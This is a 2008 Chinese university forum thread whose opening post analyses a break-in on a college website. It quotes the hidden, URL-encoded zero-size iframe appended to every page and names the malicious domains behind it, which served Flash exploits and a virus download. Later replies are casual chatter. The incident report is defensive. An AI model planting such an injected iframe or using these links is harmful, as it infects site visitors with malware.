和山论坛

 找回密码
 会员注册
查看: 7109|回复: 123
打印 上一主题 下一主题

再次对学校网管的安全意识没想法

[复制链接]
跳转到指定楼层
楼主
发表于 2008-9-4 21:31 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
(以下红色部分请勿轻易点击,否则后果自负)


浙科院机械学院网站 http://jdx.zust.edu.cn 被黑客入侵

网站内所有网页文件(ASP,HTM,HTML....)的末尾被添加了一句代码:

<iframe src=http://%61%76%65%31%2E%63%6 width=0 height=0></iframe>(意思是加载一个宽度和高度都为0也就是看不到的网页,最常用的挂马方式之一)


继续追查得到的信息:

http://%61%76%65%31%2E%63%6解析后的地址为http://ave1.cn

此网站中用iframe加载了另外两个恶意页面(见图一)

http://jzm015.cn/ilink.html能自动检测机器的Flash Player的版本然后利用各版本的漏洞加载不同的恶意SWF文件(见图二)

http://www.hxg006.cn/b2.htm 中包含一个加密的1936348.js和一个加密的fxx.htm ,作用是下载并执行病毒和跳转到新的恶意网站

很流行的手段,没必要继续看下去了



再次没想法.....彻底失望....%@24



网站里的所有恶意代码我已经删了,现在可以安全访问了...










124
发表于 2008-9-5 18:20 | 只看该作者
因为我见过的申请都通过的说 有个试用期 好好表现吧
123
 楼主| 发表于 2008-9-5 18:19 | 只看该作者
原帖由 卷轴玩笑 于 2008-9-5 18:18 发表
这个不好跟帖的吧 LD会让你通过的


这样的啊...还好....
122
发表于 2008-9-5 18:18 | 只看该作者
这个不好跟帖的吧 LD会让你通过的
121
 楼主| 发表于 2008-9-5 18:03 | 只看该作者
120
发表于 2008-9-5 18:02 | 只看该作者
恩 支持支持
119
 楼主| 发表于 2008-9-5 18:00 | 只看该作者
电脑那个
118
发表于 2008-9-5 17:54 | 只看该作者
准备当哪个板块的呢
117
 楼主| 发表于 2008-9-5 17:25 | 只看该作者
原帖由 小熊寶寶 于 2008-9-5 17:22 发表
看老大啥时候关注吧%@65 ,站内短信他吧


熊宝宝你号召版主去给我推荐丫~~%@23
116
发表于 2008-9-5 17:22 | 只看该作者

回复 116楼 kucoolzhu 的帖子

看老大啥时候关注吧%@65 ,站内短信他吧
115
 楼主| 发表于 2008-9-5 17:21 | 只看该作者
提交申请了,多久能通过啊??
114
发表于 2008-9-5 17:15 | 只看该作者
你们能和大一抢到饭吃嘛%@36
113
发表于 2008-9-5 17:09 | 只看该作者
去吧去吧···晚饭时间
112
发表于 2008-9-5 17:08 | 只看该作者
那就水会去吃饭吧~
111
发表于 2008-9-5 17:08 | 只看该作者
有烤猪哇%@28 我真的饿了%@30
您需要登录后才可以回帖 登录 | 会员注册

本版积分规则


浙江科技学院和山论坛|手机客户端|小黑屋|和山论坛

GMT+8, 2025-5-11 07:07 , Processed in 0.117789 second(s), 26 queries , Gzip On.

Powered by Discuz! X3.2

© 2005-2019 和山论坛(www.hsbbs.com)

快速回复 返回顶部 返回列表